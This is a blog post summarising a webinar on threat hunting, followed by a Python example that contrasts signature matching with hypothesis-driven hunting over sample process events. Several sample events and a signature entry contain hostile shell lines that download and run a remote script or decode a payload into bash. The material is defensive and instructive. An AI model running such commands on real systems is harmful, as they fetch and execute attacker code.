Most organizations today understand that their networks, data and applications are under virtually constant siege from exploits and malware. They’ve invested in the standard array of network and endpoint security tools designed to detect and block known threats. The problem with that traditional strategy is that it is reactive: it acts only once an attack has tripped a rule. It’s time for organizations to take the initiative with threat hunting and proactively seek out unknown attacks rather than waiting to discover a breach.
Dr. Jonny Milliken, Threat Intelligence Manager for Alert Logic, and Holger Schulze, CEO of Cybersecurity Insiders, recently presented a webinar on the value and importance of threat hunting. Threat hunting puts the defender in a proactive posture. Rather than waiting for an attack to trip an alarm, threat hunting is a hypothesis-driven search through the telemetry you already collect (logs, network and endpoint data) for suspicious or potentially malicious activity that no existing rule flags, so you can take action earlier in the attack.
Traditional cyber security tools and methods are very effective at identifying and blocking known threats. However, they are reactive by construction. The attacker always gets the first move, because signature-based tools can’t defend against a threat until it has been discovered, reverse-engineered, and the required signatures developed and deployed to detect it.
Cybercriminals are also aware of the tools and techniques generally used to identify attacks, and they adapt and evolve new exploits and attacks that are designed to fly under the radar and remain undetected for as long as possible. Threat hunting turns the tables and enables you to actively seek out evidence and discover those attacks that slip past the defenses of traditional security tools.
Milliken and Schulze shared some interesting data about the current state of threat hunting from the 2018 Threat Hunting Report. The study found that more than 84 percent of those surveyed feel threat hunting should be a top security priority. More than half (55 percent) indicated that detecting advanced threats—hidden, unknown and emerging attacks—is a top challenge facing their security operations center (SOC). When asked why they have not invested in a dedicated threat hunting platform, 45 percent cited a lack of budget.
Milliken stresses that effective threat hunting requires a combination of the right tools, the right data, and the right security expertise. The right tools are of no use without good data and expert security insight. The right data won’t help you if you don’t have the tools to automate analysis and identify new or unique techniques. The right tool and the right data will get you part way, but you still need qualified information security professionals to verify and prioritize the results.
Of course, rather than investing in their own SOC or their own dedicated threat hunting platform, organizations can turn to Alert Logic. Milliken walked through an example of discovering an Oracle WebLogic remote code execution attack using threat hunting to demonstrate how Alert Logic experts go about investigating and identifying unknown attacks.
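The gap described above (a signature catches only the attack it was written for, while a hunt starts from a hypothesis about behavior) can be shown in a few lines. The following is an added illustration, not code from the Alert Logic webinar and not a reconstruction of the WebLogic case Milliken walked through: the process-creation events, the signature list, the host and user names, and the `java`-spawns-an-interpreter hypothesis are all constructed for this example. The reactive check finds only the event that contains a previously seen command string; the hunt finds that event and a variant with a different command line, and a baseline query surfaces the rare parent/child pairs an analyst would review.

```python
"""Signature matching vs. hypothesis-driven hunting over process-creation events.

Added illustration (not from the Alert Logic webinar). All events, hosts,
users, IPs and signatures below are constructed for this example.
"""
from collections import Counter

# Constructed process-creation telemetry (EDR/auditd style), one dict per event.
# A Java application server (standing in for a WebLogic instance) normally
# spawns only its own helper tooling. Two events are malicious: one matches a
# known indicator, the other is the same technique with a changed command line.
EVENTS = [
    {"host": "app01", "user": "oracle", "parent": "java", "child": "java",
     "cmdline": "java -cp /opt/wls/lib/tools.jar weblogic.deploy.Tool"},
    {"host": "app01", "user": "oracle", "parent": "java", "child": "sh",
     "cmdline": "sh -c curl http://198.51.100.7/x.sh | sh"},        # matches the known indicator
    {"host": "app02", "user": "oracle", "parent": "java", "child": "bash",
     "cmdline": "bash -c echo Y3VybCAuLi4= | base64 -d | bash"},     # variant: no indicator matches
    {"host": "app02", "user": "oracle", "parent": "java", "child": "java",
     "cmdline": "java -cp /opt/wls/lib/tools.jar weblogic.deploy.Tool"},
    {"host": "db01", "user": "root", "parent": "cron", "child": "sh",
     "cmdline": "sh /etc/cron.daily/logrotate"},                     # benign shell, different parent
    {"host": "app01", "user": "oracle", "parent": "java", "child": "java",
     "cmdline": "java -version"},
]

# Reactive control: an indicator distilled from a previously analysed attack.
SIGNATURES = ["curl http://198.51.100.7/x.sh"]

# Hunting hypothesis (assumed for this example): an application server's JVM has
# no business spawning a shell or scripting interpreter; any such child is worth
# an analyst's time, whatever the command line looks like.
INTERPRETERS = {"sh", "bash", "dash", "zsh", "cmd.exe", "powershell.exe", "python", "perl"}


def signature_matches(events):
    """Return events whose command line contains a known-bad string."""
    return [e for e in events if any(s in e["cmdline"] for s in SIGNATURES)]


def hunt_interpreter_children(events, parent="java"):
    """Hypothesis-driven hunt: flag interpreters spawned by the app-server JVM."""
    return [e for e in events if e["parent"] == parent and e["child"] in INTERPRETERS]


def hunt_rare_children(events, max_count=1):
    """Baseline-driven hunt: flag (parent, child) pairs seen at most max_count times.

    Rare pairs are not proof of compromise; they are the review queue that the
    'expertise' leg of the tools/data/expertise triad works through.
    """
    counts = Counter((e["parent"], e["child"]) for e in events)
    return [e for e in events if counts[(e["parent"], e["child"])] <= max_count]


if __name__ == "__main__":
    print("signature hits :", [e["host"] for e in signature_matches(EVENTS)])
    print("hypothesis hunt:", [e["host"] for e in hunt_interpreter_children(EVENTS)])
    print("rare pairs     :", [(e["parent"], e["child"]) for e in hunt_rare_children(EVENTS)])
```

The signature check returns only the `app01` event; the interpreter hunt returns both the `app01` and the `app02` event, and the rarity query also surfaces the benign `cron` → `sh` pair, which is the kind of false positive a qualified analyst must triage rather than a tool alone.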